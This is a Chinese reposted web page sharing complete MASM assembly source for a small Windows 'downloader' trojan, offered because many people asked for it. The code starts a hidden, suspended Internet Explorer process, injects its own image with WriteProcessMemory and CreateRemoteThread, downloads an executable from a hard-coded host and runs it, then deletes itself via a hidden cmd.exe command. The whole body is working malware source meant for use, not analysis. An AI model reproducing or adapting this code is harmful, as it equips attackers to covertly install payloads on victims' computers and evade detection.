无DLL,插IE下载者 3.5K

发布时间:2016-12-9 13:53:35 编辑:www.fx114.net 分享查询网我要评论
本篇文章主要介绍了"无DLL,插IE下载者 3.5K",主要涉及到无DLL,插IE下载者 3.5K方面的内容,对于无DLL,插IE下载者 3.5K感兴趣的同学可以参考一下。

无DLL,插IE下载者 3.5K (转)   [ 日期: 2006-05-17 01:11 | 作者: d99 | 来自: 转 | | ]   //好多兄弟都找我要这个,我就把源码帖在这里把.386.model flat,stdcalloption casemap:noneinclude windows.incinclude urlmon.incinclude user32.incinclude kernel32.incincludelib user32.libincludelib urlmon.libincludelib kernel32.libDownload proto.dataszUrlmon   db "urlmon.dll",0szURL     db "http://192.168.1.5/123.exe",24 dup (0)szFile     db "c:/test.exe",39 dup (0)szCmdline   db "c:/program files/internet explorer/iexplore.exe",0szAdd db '/cmd.exe /c del "',0quote db '"',0.data?cbSize DWORD ?cdWritten DWORD ?pid DWORD ?hProcess DWORD ?hModule DWORD ?hThread DWORD ?startupinfo STARTUPINFO <?>pi PROCESS_INFORMATION <>SelfPath db MAX_PATH dup (?)szCmd db MAX_PATH dup (?).codestart:  invoke GetModuleHandle,0  mov hModule,eax  mov edi,eax  assume edi:ptr IMAGE_DOS_HEADER  add edi,[edi].e_lfanew  add edi,sizeof DWORD  assume edi:ptr IMAGE_FILE_HEADER  add edi,sizeof IMAGE_FILE_HEADER  assume edi:ptr IMAGE_OPTIONAL_HEADER32  mov eax,[edi].SizeOfImage  mov cbSize,eax  lea esi,offset startupinfo  assume esi:ptr STARTUPINFO  mov [esi].cb,sizeof STARTUPINFO  invoke GetStartupInfo,offset startupinfo  mov [esi].wShowWindow,SW_HIDE  mov [esi].dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES  invoke createProcess,offset szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offset startupinfo,offset pi  lea esi,offset pi  assume esi:ptr PROCESS_INFORMATION  mov eax,[esi].dwProcessId  mov pid,eax  invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid  mov hProcess,eax  invoke VirtualAllocEx,hProcess,hModule,cbSize,MEM_COMMIT or MEM_RESERVE,PAGE_EXECUTE_READWRITE  invoke WriteProcessMemory,hProcess,eax,hModule,cbSize,offset cdWritten  invoke createRemoteThread,hProcess,0,0,addr Download,hModule,0,ebx  mov hThread,eax  invoke WaitForSingleObject,hThread,INFINITE  invoke CloseHandle,hThread  invoke CloseHandle,hProcessdeleteSelf:  invoke GetModuleFileName,NULL,offset SelfPath,MAX_PATH  invoke GetSystemDirectory,offset szCmd,MAX_PATH  invoke lstrcat,offset szCmd,offset szAdd  invoke lstrcat,offset szCmd,offset SelfPath  invoke lstrcat,offset szCmd,offset quote  invoke Sleep,200  invoke WinExec,offset szCmd,SW_HIDE  invoke ExitProcess,0  Download proc  invoke LoadLibrary,offset szUrlmon  invoke URLDownloadToFile,NULL,offset szURL,offset szFile,0,NULL  invoke WinExec,offset szFile,SW_SHOW  invoke ExitThread,0Download endpend start  

上一篇:SA权限仅需xp_regwrite即可有dos shell
下一篇:想成为嵌入式程序员应知道的0x10个基本问题

相关文章

相关评论